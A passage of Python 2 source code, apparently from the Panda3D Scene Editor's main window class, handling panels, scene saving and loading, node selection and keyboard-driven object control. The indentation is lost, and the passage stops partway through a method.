# So, in here we will call dataHolder(AllScene) to get the target light node
# Then, this function will put this light node back into lighting
# panel and update the data on the panel.
#################################################################
lightNode = AllScene.getLightNode(lightName)
if self.lightingPanel != None:
self.lightingPanel.updateDisplay(lightNode)
return
def addLight(self, type):
#################################################################
# addLight(self, type)
# This function will be called when the user tries to add a light from the lightingPanel
# (by sending out the message)
# So, in here we will call dataHolder(AllScene) to create a default light node
# by the type that user assigned.
# Then, this function will put this light node back into lighting
# panel with the newest lighting list and update the data on the panel.
#################################################################
list, lightNode = AllScene.createLight(type = type)
if self.lightingPanel != None:
self.lightingPanel.updateList(list,lightNode)
self.makeDirty()
return
def lightingPanelClose(self):
#################################################################
# lightingPanelClose(self)
# This function will be called when user try to close the lighting panel
# This function will re-config the state of the lighting panel button on the top screen
# And it will set the self.lightingPanel to None
#################################################################
self.menuPanel.entryconfig('Lighting Panel', state=NORMAL)
self.lightingPanel = None
return
def openPropertyPanel(self, nodePath = None):
#################################################################
# openPropertyPanel(self, nodePath = None)
# This function will be called when the user tries to open a property window
# for one specific node in the scene.
# Here we will call dataHolder to get the basic properties
# we would like to let the user see and change.
# And then we pass that information into propertyWindow
#################################################################
type, info = AllScene.getInfoOfThisNode(nodePath)
name = nodePath.getName()
if not self.propertyWindow.has_key(name):
self.propertyWindow[name] = propertyWindow(nodePath, type,info )
pass
def closePropertyWindow(self, name):
if self.propertyWindow.has_key(name):
del self.propertyWindow[name]
return
def openMetadataPanel(self,nodePath=None):
print nodePath
self.MetadataPanel=MetadataPanel(nodePath)
pass
def duplicate(self, nodePath = None):
#################################################################
# duplicate(self, nodePath = None)
# This function will be called when user try to open the duplication window
#################################################################
print '----Duplication!!'
if nodePath != None:
self.duplicateWindow = duplicateWindow(nodePath = nodePath)
pass
def remove(self, nodePath = None):
#################################################################
# remove(self, nodePath = None)
# This function will be called when the user tries to delete a node from the scene.
#
# For safety reasons,
# we deselect first and then remove the given node.
#
#################################################################
if nodePath==None:
if self.nodeSelected == None:
return
nodePath = self.nodeSelected
self.deSelectNode()
if AllScene.isLight(nodePath.getName()):
self.removeLight(nodePath)
else:
AllScene.removeObj(nodePath)
pass
def addDummyNode(self, nodepath = None):
#################################################################
# addDummyNode(self, nodepath = None)
# This function will be called when user try to create a dummy node into scene
#
# Here we will call dataHolder to create a dummy node
# and reparent it to the nodePath that user has assigned.
#
#################################################################
AllScene.addDummyNode(nodepath)
self.makeDirty()
pass
def addCollisionObj(self, nodepath = None):
#################################################################
# addCollisionObj(self, nodepath = None)
# This function will be called when user try to create a collision object into the scene
#
# Here we will call collisionWindow to ask user what kind of collision objects they want to have.
# Then, send the information and generated collision object to dataHolder to finish the whole process
# and reparent it to the nodePath that user has assigned.
#
#################################################################
self.collisionWindow = collisionWindow(nodepath)
pass
def setAsReparentTarget(self, nodepath = None):
#################################################################
# setAsReparentTarget(self, nodepath = None)
# This function will be called when the user selects a nodePath
# and wants to reparent another node under it. (From the side window pop-up menu)
#################################################################
SEditor.setActiveParent(nodepath)
return
def reparentToNode(self, nodepath = None):
#################################################################
# reparentToNode(self, nodepath = None)
# This function will be called when the user tries to reparent a node to
# the node previously selected as the reparent target.
#
# The whole reparent process is handled by seSession,
# which is tuned from DirectSession
#
#################################################################
SEditor.reparent(nodepath, fWrt = 1)
return
def openPlacerPanel(self, nodePath = None):
#################################################################
# openPlacerPanel(self, nodePath = None)
# This function will be called when the user tries to open a placer panel.
# This call only succeeds if no other placer panel is currently active.
#################################################################
if(self.placer==None):
self.placer = Placer()
self.menuPanel.entryconfig('Placer Panel', state=DISABLED)
return
def closePlacerPanel(self):
#################################################################
# closePlacerPanel(self)
# This function will be called when user close the placer panel.
# Here we will reset the self.placer back to None.
# (You can think this is just like a reference count)
#################################################################
self.placer = None
self.menuPanel.entryconfig('Placer Panel', state=NORMAL)
return
def openAnimPanel(self, nodePath = None):
#################################################################
# openAnimPanel(self, nodePath = None)
# This function will be called when the user tries to open an Animation Panel.
# This will generate a panel and put it
# into a dictionary using the actor's name as an index.
# So, if there is already an animation panel for the target actor,
# it won't allow the user to open another one.
#################################################################
name = nodePath.getName()
if AllScene.isActor(name):
if self.animPanel.has_key(name):
print '---- You already have an animation panel for this Actor!'
return
else:
Actor = AllScene.getActor(name)
self.animPanel[name] = seAnimPanel.AnimPanel(aNode=Actor)
pass
def openMoPathPanel(self, nodepath = None):
#################################################################
# openMoPathPanel(self, nodepath = None)
# This function will open a Motion Path Recorder for you.
#################################################################
if self.MopathPanel == None:
self.MopathPanel = MopathRecorder()
pass
def mopathClosed(self):
self.MopathPanel = None
return
def changeName(self, nodePath, nName):
#################################################################
# changeName(self, nodePath, nName)
# This function will be called when user tries to change the name of the node
#################################################################
oName = nodePath.getName() # I need this line in order to check the obj name in the control panel.
AllScene.rename(nodePath,nName)
# reset the list in the controller panel if it has been opened.
if (self.controllerPanel) != None:
list = AllScene.getAllObjNameAsList()
self.controllerPanel.resetNameList(list = list, name = oName, nodePath = nodePath)
return
# Take care things under File menu
def newScene(self):
#################################################################
# newScene(self)
# This function will clear whole stuff in the scene
# and will reset the application title to "New Scene"
#################################################################
self.closeAllSubWindows() ## Close all sub window
if(self.CurrentFileName):
currentF=Filename(self.CurrentFileName)
self.CurrentFileName=None
AllScene.resetAll()
currentModName=currentF.getBasenameWoExtension()
# Let us actually remove the scene from sys modules... this is done because every scene is loaded as a module
# And if we reload a scene Python won't reload it since it's already in sys.modules... and hence we delete it
# If there is ever a garbage collection bug... this might be a point to look at
if sys.modules.has_key(currentModName):
del sys.modules[currentModName]
print sys.getrefcount(AllScene.theScene)
del AllScene.theScene
else:
AllScene.resetAll()
self.parent.title('Scene Editor - New Scene')
pass
def openScene(self):
#################################################################
# openScene(self)
#################################################################
# In the future try and provide merging of two scenes
if(self.CurrentFileName or self.Dirty):
saveScene = tkMessageBox._show("Load scene","Save the current scene?",icon = tkMessageBox.QUESTION,type = tkMessageBox.YESNOCANCEL)
if (saveScene == "yes"):
self.saveScene()
elif (saveScene == "cancel"):
return
self.closeAllSubWindows() ## Close all sub window
if(self.CurrentFileName):
currentF=Filename(self.CurrentFileName)
AllScene.resetAll()
currentModName=currentF.getBasenameWoExtension()
# Let us actually remove the scene from sys modules... this is done because every scene is loaded as a module
# And if we reload a scene Python won't reload it since it's already in sys.modules... and hence we delete it
# If there is ever a garbage collection bug... this might be a point to look at
if sys.modules.has_key(currentModName):
del sys.modules[currentModName]
print sys.getrefcount(AllScene.theScene)
del AllScene.theScene
else:
AllScene.resetAll()
self.CurrentFileName = AllScene.loadScene()
if(self.CurrentFileName==None):
return
thefile=Filename(self.CurrentFileName)
thedir=thefile.getFullpathWoExtension()
print "SCENE EDITOR::" + thedir
self.CurrentDirName=thedir
if self.CurrentFileName != None:
self.parent.title('Scene Editor - '+ Filename.fromOsSpecific(self.CurrentFileName).getBasenameWoExtension())
if self.lightingPanel !=None:
lightList=AllScene.getList()
self.lightingPanel.updateList(lightList)
messenger.send('SGE_Update Explorer',[render])
# Close the side window in order to reset all world settings to fit the scene we have loaded.
self.sideWindow.quit()
# Try to re-open the side window again
while self.sideWindow == None:
wColor = base.getBackgroundColor()
self.worldColor[0] = wColor.getX()
self.worldColor[1] = wColor.getY()
self.worldColor[2] = wColor.getZ()
self.worldColor[3] = wColor.getW()
self.lightEnable = 1
self.ParticleEnable = 1
self.collision = 1
self.openSideWindow()
def saveScene(self):
#################################################################
# saveScene(self)
# If this is an open file call saveAsScene
# or else instantiate FileSaver from seFileSaver.py and pass it the filename
# If this filename exists in sys.modules you cannot use it
#################################################################
if(self.CurrentFileName):
f=FileSaver()
f.SaveFile(AllScene,self.CurrentFileName,self.CurrentDirName,1)
self.Dirty=0
else:
self.saveAsScene()
pass
def saveAsBam(self):
fileName = tkFileDialog.asksaveasfilename(filetypes = [("BAM",".bam")],title = "Save Scenegraph as Bam file")
theScene=render.find("**/Scene")
if not theScene.isEmpty(): # render.find() returns an empty NodePath (never None) when nothing matches
theScene.writeBamFile(fileName)
else:
render.writeBamFile(fileName+".bad")
print " Scenegraph saved as :" +str(fileName)
def loadFromBam(self):
fileName = tkFileDialog.askopenfilename(filetypes = [("BAM",".bam")],title = "Load Scenegraph from Bam file")
if fileName: # askopenfilename returns an empty string when the dialog is cancelled
d=path(fileName)
scene=loader.loadModel(d.relpath())
scene.reparentTo(render)
def saveAsScene(self):
#################################################################
# saveAsScene(self)
# Ask for filename using a file save dialog
# If this filename exists in sys.modules you cannot use it
# Instantiate FileSaver from seFileSaver.py and pass it the filename
#################################################################
fileName = tkFileDialog.asksaveasfilename(filetypes = [("PY","py")],title = "Save Scene")
if(not fileName):
return
fCheck=Filename(fileName)
#print fCheck.getBasenameWoExtension()
###############################################################################
# !!!!! See if a module exists by this name... if it does you cannot use this filename !!!!!
###############################################################################
if(sys.modules.has_key(fCheck.getBasenameWoExtension())):
tkMessageBox.showwarning(
"Save file",
"Cannot save with this name because there is a system module with the same name. Please resave as something else."
)
return
self.CurrentDirName=fileName
fileName=fileName+".py"
f=FileSaver()
self.CurrentFileName=fileName
f.SaveFile(AllScene,fileName,self.CurrentDirName,0)
self.Dirty=0
self.parent.title('Scene Editor - '+ Filename.fromOsSpecific(self.CurrentFileName).getBasenameWoExtension())
pass
def loadModel(self):
#################################################################
# loadModel(self)
# This function will be called when user tries to load a model into the scene.
# Here we will pop-up a dialog to ask user which model file should be loaded in.
# Then, pass the path to dataHolder to load the model in.
#################################################################
modelFilename = askopenfilename(
defaultextension = '.egg',
filetypes = (('Egg Files', '*.egg'),
('Bam Files', '*.bam'),
('All files', '*')),
initialdir = '.',
title = 'Load New Model',
parent = self.parent)
if modelFilename:
self.makeDirty()
if not AllScene.loadModel(modelFilename, Filename.fromOsSpecific(modelFilename)):
print '----Error! No Such Model File!'
pass
def loadActor(self):
#################################################################
# loadActor(self)
# This function will be called when user tries to load an Actor into the scene.
# Here we will pop-up a dialog to ask user which Actor file should be loaded in.
# Then, pass the path to dataHolder to load the Actor in.
#################################################################
ActorFilename = askopenfilename(
defaultextension = '.egg',
filetypes = (('Egg Files', '*.egg'),
('Bam Files', '*.bam'),
('All files', '*')),
initialdir = '.',
title = 'Load New Actor',
parent = self.parent)
if ActorFilename:
self.makeDirty()
if not AllScene.loadActor(ActorFilename, Filename.fromOsSpecific(ActorFilename)):
print '----Error! No Such Model File!'
pass
def importScene(self):
self.makeDirty()
print '----God bless you Please Import!'
pass
## Take care of those things under the Edit menu
def unDo(self):
pass
def reDo(self):
pass
def deSelectNode(self, nodePath=None):
#################################################################
# deSelectNode(self, nodePath=None)
# This function will deselect the node which we have selected currently.
# This will also remove the monitor task which monitor selected object's
# position, orientation and scale each frame.
#################################################################
if nodePath != None:
self.seSession.deselect(nodePath)
if self.isSelect:
self.isSelect = False
#if self.nodeSelected != None:
# self.nodeSelected.hideBounds()
self.nodeSelected =None
self.menuEdit.entryconfig('Deselect', state=DISABLED)
self.menuEdit.entryconfig('Add Dummy', state=DISABLED)
self.menuEdit.entryconfig('Duplicate', state=DISABLED)
self.menuEdit.entryconfig('Remove', state=DISABLED)
self.menuEdit.entryconfig('Object Properties', state=DISABLED)
if self.sideWindowCount==1:
self.sideWindow.SGE.deSelectTree()
if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
taskMgr.remove('seMonitorSelectedNode')
return
pass
def addDummy(self):
#################################################################
# addDummy(self)
# This function will do nothing but call other function
# to add a dummy into the scene.
#
# Ok... this is really redundancy...
#
#################################################################
self.addDummyNode(self.nodeSelected)
pass
def duplicateNode(self):
#################################################################
# duplicateNode(self)
# This function will do nothing but call other function
# to open the duplication window.
#
# Ok... this is really redundancy...
#
#################################################################
if self.nodeSelected!=None:
self.duplicate(self.nodeSelected)
pass
def removeNode(self):
#################################################################
# removeNode(self)
# This function will do nothing but call other function
# to remove the current selected node..
#
# Ok... this is really redundancy...
#
################################################################
self.remove(self.nodeSelected)
pass
def showObjProp(self):
################################################################
# showObjProp(self)
# This function will do nothing but call other function
# to open the property window of current selected node..
#
# Ok... this is really redundancy...
#
################################################################
self.openPropertyPanel(self.nodeSelected)
pass
def showCameraSetting(self):
################################################################
# showCameraSetting(self)
# This function will do nothing but call other function
# to open the property window of camera..
#
# Ok... this is really redundancy...
#
################################################################
self.openPropertyPanel(camera)
pass
def showRenderSetting(self):
'''Currently, no idea what's going to pop out here...'''
pass
## Take care of those things under the Panel menu
def openSideWindow(self):
################################################################
# openSideWindow(self)
# This function will open the side window and set the reference number
# so that we can make sure there won't be two or more side windows at the same time.
################################################################
if self.sideWindowCount==0:
self.sideWindow = sideWindow(worldColor = self.worldColor,
lightEnable = self.lightEnable,
ParticleEnable = self.ParticleEnable,
basedriveEnable = self.basedriveEnable,
collision = self.collision,
backface = self.backface,
texture = self.texture,
wireframe = self.wireframe,
grid = self.grid,
widgetVis = self.widgetVis,
enableAutoCamera = self.enableAutoCamera)
self.sideWindowCount = 1
self.menuPanel.entryconfig('Side Window', state=DISABLED)
return
def openAnimationPanel(self):
################################################################
# openAnimationPanel(self)
# This function will do nothing but call other function
# to open the animation window for selected node(if it is an Actor)..
#
# Ok... this is really redundancy...
#
################################################################
if AllScene.isActor(self.nodeSelected):
self.openAnimPanel(self.nodeSelected)
pass
def openMopathPanel(self):
################################################################
# openMopathPanel(self)
# This function will create a Motion Path Recorder
################################################################
MopathPanel = MopathRecorder()
pass
def toggleParticleVisable(self, visable):
################################################################
# toggleParticleVisable(self, visable)
# This function will be called each time user has toggled
# the check box of Particle visibility in the side window.
# The reason we keep track of this is that
# we have to know whether to show/hide the model on newly created particles
################################################################
self.ParticleEnable = visable
AllScene.toggleParticleVisable(visable)
return
def openLightingPanel(self):
################################################################
# openLightingPanel(self)
# open the lighting panel here.
# If a lighting panel already exists, do nothing
################################################################
if self.lightingPanel==None:
self.lightingPanel = lightingPanel(AllScene.getLightList())
self.menuPanel.entryconfig('Lighting Panel', state=DISABLED)
return
def addParticleEffect(self,effect_name,effect,node):
AllScene.particleDict[effect_name]=effect
AllScene.particleNodes[effect_name]=node
if not self.ParticleEnable:
AllScene.particleNodes[effect_name].setTransparency(True)
AllScene.particleNodes[effect_name].setAlphaScale(0)
AllScene.particleNodes[effect_name].setBin("fixed",1)
return
def openParticlePanel(self):
if self.particlePanel != None:
## There is already a Particle Panel!
return
if(len(AllScene.particleDict)==0):
self.particlePanel=seParticlePanel.ParticlePanel()
else:
for effect in AllScene.particleDict:
theeffect=AllScene.particleDict[effect]
self.particlePanel=seParticlePanel.ParticlePanel(particleEffect=theeffect,effectsDict=AllScene.particleDict)
pass
def closeParticlePanel(self):
self.particlePanel = None
return
def openInputPanel(self):
if self.controllerPanel==None:
list = AllScene.getAllObjNameAsList()
type, dataList = AllScene.getControlSetting()
self.controllerPanel = controllerWindow(listOfObj = list, controlType = type, dataList = dataList)
pass
def closeInputPanel(self):
self.controllerPanel = None
return
def requestObjFromControlW(self, name):
################################################################
# requestObjFromControlW(self, name)
# Call back function
# Each time when user selects a node from Control Panel,
# this function will be called.
# This function will get the actual nodePath from dataHolder and then
# set it back into controller panel
################################################################
node = AllScene.getObjFromSceneByName(name)
if (self.controllerPanel) != None and (node!=None):
self.controllerPanel.setNodePathIn(node)
return
def setControlSet(self, controlType, dataList):
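# For the 'Keyboard' control type, dataList is expected to hold:
# [0] the target nodePath, [1] the key-name map, [2] the per-key speed map.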
if controlType == 'Keyboard':
self.controlTarget = dataList[0]
self.keyboardMapDict.clear()
self.keyboardMapDict = dataList[1].copy()
self.keyboardSpeedDict.clear()
self.keyboardSpeedDict = dataList[2].copy()
return
def startControl(self, controlType, dataList):
if not self.enableControl:
self.enableControl = True
else:
# Stop the current control setting first
# Also this will make sure we won't catch wrong keyboard message
self.stopControl(controlType)
self.enableControl = True
self.setControlSet(controlType, dataList)
self.lastContorlTimer = globalClock.getFrameTime()
if controlType == 'Keyboard':
self.controlType = 'Keyboard'
self.keyControlEventDict = {}
self.transNodeKeyboard = self.controlTarget.attachNewNode('transformNode')
self.transNodeKeyboard.hide()
for index in self.keyboardMapDict:
self.keyControlEventDict[index] = 0
self.accept(self.keyboardMapDict[index], lambda a = index:self.keyboardPushed(a))
self.accept(self.keyboardMapDict[index]+'-up', lambda a = index:self.keyboardReleased(a))
return
def stopControl(self, controlType):
if not self.enableControl:
return
if controlType == 'Keyboard':
self.enableControl = False
for index in self.keyboardMapDict:
self.ignore(self.keyboardMapDict[index])
self.ignore(self.keyboardMapDict[index]+'-up')
taskMgr.remove("KeyboardControlTask")
self.transNodeKeyboard.removeNode()
return
def keyboardPushed(self, key):
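# The control task is spawned on the first key press; keyboardReleased removes it
# again once every tracked key has been released.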
self.keyControlEventDict[key] = 1
if not taskMgr.hasTaskNamed("KeyboardControlTask"):
self.keyboardLastTimer = globalClock.getFrameTime()
taskMgr.add(self.keyboardControlTask, "KeyboardControlTask")
return
def keyboardReleased(self, key):
self.keyControlEventDict[key] = 0
for index in self.keyControlEventDict:
if self.keyControlEventDict[index] == 1:
return
if taskMgr.hasTaskNamed("KeyboardControlTask"):
taskMgr.remove("KeyboardControlTask")
return
def keyboardControlTask(self, task):
newTimer = globalClock.getFrameTime()
delta = newTimer - self.keyboardLastTimer
self.keyboardLastTimer = newTimer
pos = self.controlTarget.getPos()
hpr = self.controlTarget.getHpr()
scale = self.controlTarget.getScale()
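# The hidden transform node is parented to the control target, so setting its
# pos/hpr below moves it in the target's local space; reading the result back
# relative to the target's parent converts this frame's delta into parent space
# before it is applied to the target itself.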
self.transNodeKeyboard.setPosHpr((self.keyControlEventDict['KeyRight']*self.keyboardSpeedDict['SpeedRight']-self.keyControlEventDict['KeyLeft']*self.keyboardSpeedDict['SpeedLeft'])*delta,
(self.keyControlEventDict['KeyForward']*self.keyboardSpeedDict['SpeedForward']-self.keyControlEventDict['KeyBackward']*self.keyboardSpeedDict['SpeedBackward'])*delta,
(self.keyControlEventDict['KeyUp']*self.keyboardSpeedDict['SpeedUp']-self.keyControlEventDict['KeyDown']*self.keyboardSpeedDict['SpeedDown'])*delta,
(self.keyControlEventDict['KeyTurnLeft']*self.keyboardSpeedDict['SpeedTurnLeft']-self.keyControlEventDict['KeyTurnRight']*self.keyboardSpeedDict['SpeedTurnRight'])*delta,
(self.keyControlEventDict['KeyTurnUp']*self.keyboardSpeedDict['SpeedTurnUp']-self.keyControlEventDict['KeyTurnDown']*self.keyboardSpeedDict['SpeedTurnDown'])*delta,
(self.keyControlEventDict['KeyRollLeft']*self.keyboardSpeedDict['SpeedRollLeft']-self.keyControlEventDict['KeyRollRight']*self.keyboardSpeedDict['SpeedRollRight'])*delta)
newPos = self.transNodeKeyboard.getPos(self.controlTarget.getParent())
newHpr = self.transNodeKeyboard.getHpr(self.controlTarget.getParent())
overAllScale = self.keyControlEventDict['KeyScaleUp']*self.keyboardSpeedDict['SpeedScaleUp']-self.keyControlEventDict['KeyScaleDown']*self.keyboardSpeedDict['SpeedScaleDown']
newScale = Point3(scale.getX() + (overAllScale + self.keyControlEventDict['KeyScaleXUp']*self.keyboardSpeedDict['SpeedScaleXUp'] - self.keyControlEventDict['KeyScaleXDown']*self.keyboardSpeedDict['SpeedScaleXDown'])*delta,
scale.getY() + (overAllScale + self.keyControlEventDict['KeyScaleYUp']*self.keyboardSpeedDict['SpeedScaleYUp'] - self.keyControlEventDict['KeyScaleYDown']*self.keyboardSpeedDict['SpeedScaleYDown'])*delta,
scale.getZ() + (overAllScale + self.keyControlEventDict['KeyScaleZUp']*self.keyboardSpeedDict['SpeedScaleZUp'] - self.keyControlEventDict['KeyScaleZDown']*self.keyboardSpeedDict['SpeedScaleZDown'])*delta
)
self.controlTarget.setPos(newPos.getX(), newPos.getY() , newPos.getZ())
self.controlTarget.setHpr(newHpr.getX(), newHpr.getY() , newHpr.getZ())
self.controlTarget.setScale(newScale.getX(),newScale.getY(),newScale.getZ())
self.transNodeKeyboard.setPosHpr(0,0,0,0,0,0)
return Task.cont
## Misc
##### This one get the event from SGE (Scene Graph Explorer) and Picking
def selectNode(self, nodePath=None, callBack = True):
################################################################
# selectNode(self, nodePath=None, callBack = True)
# This will be called when the user tries to select nodes from the
# side window.
# It will also call seSession to select this node in order to keep the data consistent
################################################################
if nodePath==None:
self.isSelect = False
self.nodeSelected =None
if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
taskMgr.remove('seMonitorSelectedNode')
return
else:
self.isSelect = True
#if self.nodeSelected != None:
# self.nodeSelected.hideBounds()
self.nodeSelected = nodePath
#self.nodeSelected.showBounds()
self.menuEdit.entryconfig('Deselect', state=NORMAL)
self.menuEdit.entryconfig('Add Dummy', state=NORMAL)
self.menuEdit.entryconfig('Duplicate', state=NORMAL)
self.menuEdit.entryconfig('Remove', state=NORMAL)
self.menuEdit.entryconfig('Object Properties', state=NORMAL)
if callBack:
self.seSession.select(nodePath,fResetAncestry=1)
messenger.send('SGE_Update Explorer',[render])
if not taskMgr.hasTaskNamed('seMonitorSelectedNode'):
self.oPos = self.nodeSelected.getPos()
self.oHpr = self.nodeSelected.getHpr()
self.oScale = self.nodeSelected.getScale()
taskMgr.add(self.monitorSelectedNodeTask, 'seMonitorSelectedNode')
return
pass
def selectFromScene(self, nodePath=None, callBack=True):
################################################################
# selectFromScene(self, nodePath=None, callBack = True)
# This will be called when the user tries to select nodes from the
# scene. (By picking)
# Actually this will be called by seSession
# The reason we have two selection functions is that we don't want them to call each other and never stop...
################################################################
if nodePath==None:
self.isSelect = False
self.nodeSelected =None
if taskMgr.hasTaskNamed('seMonitorSelectedNode'):
taskMgr.remove('seMonitorSelectedNode')
return
else:
self.isSelect = True
#if self.nodeSelected != None:
# self.nodeSelected.hideBounds()
self.nodeSelected = nodePath
#self.nodeSelected.showBounds()
self.menuEdit.entryconfig('Deselect', state=NORMAL)
self.menuEdit.entryconfig('Add Dummy', state=NORMAL)
self.menuEdit.entryconfig('Duplicate', state=NORMAL)
self.menuEdit.entryconfig('Remove', state=NORMAL)
self.menuEdit.entryconfig('Object Properties', state=NORMAL)
self.sideWindow.SGE.selectNodePath(nodePath,callBack)
messenger.send('SGE_Update Explorer',[render])
if not taskMgr.hasTaskNamed('seMonitorSelectedNode'):
self.oPos = self.nodeSelected.getPos()
self.oHpr = self.nodeSelected.getHpr()
self.oScale = self.nodeSelected.getScale()
taskMgr.add(self.monitorSelectedNodeTask, 'seMonitorSelectedNode')
return
pass
def monitorSelectedNodeTask(self, task):
################################################################
# monitorSelectedNodeTask(self, task)
# This is a function which will keep tracking
# the position, orientation and scale data of the selected node and update the display on the screen.
# Also, it will send out messages to synchronize the data in the placer and property window.
################################################################
if self.nodeSelected != None:
pos = self.nodeSelected.getPos()
hpr = self.nodeSelected.getHpr()
scale = self.nodeSelected.getScale()
if ((self.oPos != pos )or(self.oScale != scale)or(self.oHpr != hpr)):
messenger.send('forPorpertyWindow'+self.nodeSelected.getName(),[pos, hpr, scale])
messenger.send('placerUpdate')
self.oPos = pos
self.oScale = scale
self.oHpr = hpr
self.posLabel['text'] = "Position : X: %2.2f Y: %2.2f Z: %2.2f"%(pos.getX(), pos.getY(),pos.getZ())
self.hprLabel['text'] = "Orientation: H: %2.2f P: %2.2f R: %2.2f"%(hpr.getX(), hpr.getY(),hpr.getZ())
self.scaleLabel['text'] = "Scale : X: %2.2f Y: %2.2f Z: %2.2f"%(scale.getX(), scale.getY(),scale.getZ())
return Task.cont
def deselectFromScene(self):
################################################################
# deselectFromScene(self)
# This function will do nothing but call other function
# to delete selected node...
#
# Ok... this is really redundancy...
#
################################################################
self.deSelectNode(self.nodeSelected)
messenger.send('SGE_Update Explorer',[render])
##### Take care the even quest from Side Window
def lightToggle(self):
################################################################
# lightToggle(self)
# This function will do nothing but call other function
# to toggle the light...
################################################################
self.makeDirty()
AllScene.toggleLight()
return
def sideWindowClose(self,worldColor,lightEnable,ParticleEnable, basedriveEnable,collision,
backface, texture, wireframe, grid, widgetVis, enableAutoCamera):
################################################################
# sideWindowClose(self,worldColor,lightEnable,ParticleEnable, basedriveEnable,collision,
# backface, texture, wireframe, grid, widgetVis, enableAutoCamera):
# This function will be called when the user closes the side window.
# Here we will store all the world-setting parameters back in the sceneEditor.
# So, the next time people reopen the side window, it will still keep the same world settings.
################################################################
if self.sideWindowCount==1:
self.worldColor = worldColor
self.lightEnable = lightEnable
self.ParticleEnable = ParticleEnable
self.basedriveEnable = basedriveEnable
self.collision = collision
self.backface = backface
self.texture = texture
self.wireframe = wireframe
self.grid = grid
self.enableAutoCamera = enableAutoCamera
self.widgetVis = widgetVis
self.sideWindowCount=0
self.sideWindow = None
self.menuPanel.entryconfig('Side Window', state=NORMAL)
return
## Process message from Duplication Window
def duplicationObj(self, nodePath, pos, hpr, scale, num):
################################################################
# duplicationObj(self, nodePath, pos, hpr, scale, num)
# This function will do nothing but call other function
# to duplicate selected node...
#
# Ok... this is really redundancy...
#
################################################################
AllScene.duplicateObj(nodePath, pos, hpr, scale, num)
return
## Process message from Animation Panel
def animationLoader(self, nodePath, Dic):
name = nodePath.getName()
AllScene.loadAnimation(name, Dic)
return
def animationRemove(self, nodePath, name):
AllScene.removeAnimation(nodePath.getName(),name)
return
def animPanelClose(self, name):
if self.animPanel.has_key(name):
del self.animPanel[name]
return
### Blend Animation Panel
def openBlendAnimPanel(self, nodePath=None):
################################################################
# openBlendAnimPanel(self, nodePath=None)
# This function will get the user defined blending animation data from dataHolder.
# And then open a blendAnimPanel by passing those data in.
################################################################
name = nodePath.getName()
if AllScene.isActor(name):
if self.animBlendPanel.has_key(name):
print '---- You already have a Blend Animation Panel for this Actor!'
return
else:
Actor = AllScene.getActor(name)
Dict = AllScene.getBlendAnimAsDict(name)
self.animBlendPanel[name] = BlendAnimPanel(aNode=Actor, blendDict=Dict)
pass
return
def animBlendPanelSave(self, actorName, blendName, animNameA, animNameB, effect):
################################################################
# animBlendPanelSave(self, actorName, blendName, animNameA, animNameB, effect)
# This function will call dataHolder to save the blended animation.
# Then, it will reset the newest blended animation list back to animBlendPanel
################################################################
dict = AllScene.saveBlendAnim(actorName, blendName, animNameA, animNameB, effect)
self.animBlendPanel[actorName].setBlendAnimList(dict)
return
def animBlendPanelRemove(self, actorName, blendName):
################################################################
# animBlendPanelRemove(self, actorName, blendName)
# This function will call dataHolder to remove the blended animation.
# Then, it will reset the newest blended animation list back to animBlendPanel
################################################################
dict = AllScene.removeBlendAnim(actorName, blendName)
self.animBlendPanel[actorName].setBlendAnimList(dict, True)
return
def animBlendPanelRename(self, actorName, nName, oName, animNameA, animNameB, effect):
################################################################
# animBlendPanelRename(self, actorName, nName, oName, animNameA, animNameB, effect)
# This function will call dataHolder to rename the blended animation.
# Then, it will reset the newest blended animation list back to animBlendPanel
################################################################
dict = AllScene.renameBlendAnim(actorName, nName, oName, animNameA, animNameB, effect)
self.animBlendPanel[actorName].setBlendAnimList(dict)
return
def animBlendPanelClose(self, name):
################################################################
# animBlendPanelClose(self, name)
# This function will be called when Blend panel has been closed.
# Here we will reset the reference dictionary so it can be open again.
################################################################
if self.animBlendPanel.has_key(name):
del self.animBlendPanel[name]
return
## Process message from SEditor object
def toggleWidgetVis(self):
################################################################
# toggleWidgetVis(self)
# This function will be called when the user uses the hot-key to change the
# world setting. (From seSession)
# In this function we will record the change and let the side window know
# the hot-key has been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleWidgetVisFromMainW()
else:
self.widgetVis = (self.widgetVis+1)%2
def toggleBackface(self):
################################################################
# toggleBackface(self)
# This function will be called when the user uses the hot-key to change the
# world setting. (From seSession)
# In this function we will record the change and let the side window know
# the hot-key has been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleBackfaceFromMainW()
else:
self.backface = (self.backface+1)%2
def toggleTexture(self):
################################################################
# toggleTexture(self)
# This function will be called when the user uses the hot-key to change the
# world setting. (From seSession)
# In this function we will record the change and let the side window know
# the hot-key has been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleTextureFromMainW()
else:
self.texture = (self.texture+1)%2
def toggleWireframe(self):
################################################################
# toggleWireframe(self)
# This function will be called when the user uses the hot-key to change the
# world setting. (From seSession)
# In this function we will record the change and let the side window know
# the hot-key has been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleWireframeFromMainW()
else:
self.wireframe = (self.wireframe+1)%2
def openAlignPanel(self, nodePath=None):
name = nodePath.getName()
if not self.alignPanelDict.has_key(name):
list = AllScene.getAllObjNameAsList()
if name in list:
list.remove(name)
else:
return
self.alignPanelDict[name] = AlignTool(nodePath = nodePath, list = list)
return
def closeAlignPanel(self, name=None):
if self.alignPanelDict.has_key(name):
del self.alignPanelDict[name]
def alignObject(self, nodePath, name, list):
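# 'list' is a sequence of nine booleans selecting which components to copy from
# the target: X/Y/Z position, H/P/R rotation, then X/Y/Z scale.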
target = AllScene.getObjFromSceneByName(name)
pos = target.getPos()
hpr = target.getHpr()
scale = target.getScale()
if list[0]: # Align X
nodePath.setX(pos.getX())
if list[1]: # Align Y
nodePath.setY(pos.getY())
if list[2]: # Align Z
nodePath.setZ(pos.getZ())
if list[3]: # Align H
nodePath.setH(hpr.getX())
if list[4]: # Align P
nodePath.setP(hpr.getY())
if list[5]: # Align R
nodePath.setR(hpr.getZ())
if list[6]: # Scale X
nodePath.setSx(scale.getX())
if list[7]: # Scale Y
nodePath.setSy(scale.getY())
if list[8]: # Scale Z
nodePath.setSz(scale.getZ())
return
### Event from Motion Path Panel
def requestCurveList(self, nodePath,name):
curveList = AllScene.getCurveList(nodePath)
messenger.send('curveListFor'+name, [curveList])
## Steal from DirectSession...
def flash(self, nodePath = 'None Given'):
""" Highlight an object by setting it red for a few seconds """
# Clean up any existing task
taskMgr.remove('flashNodePath')
# Spawn new task if appropriate
if nodePath == 'None Given':
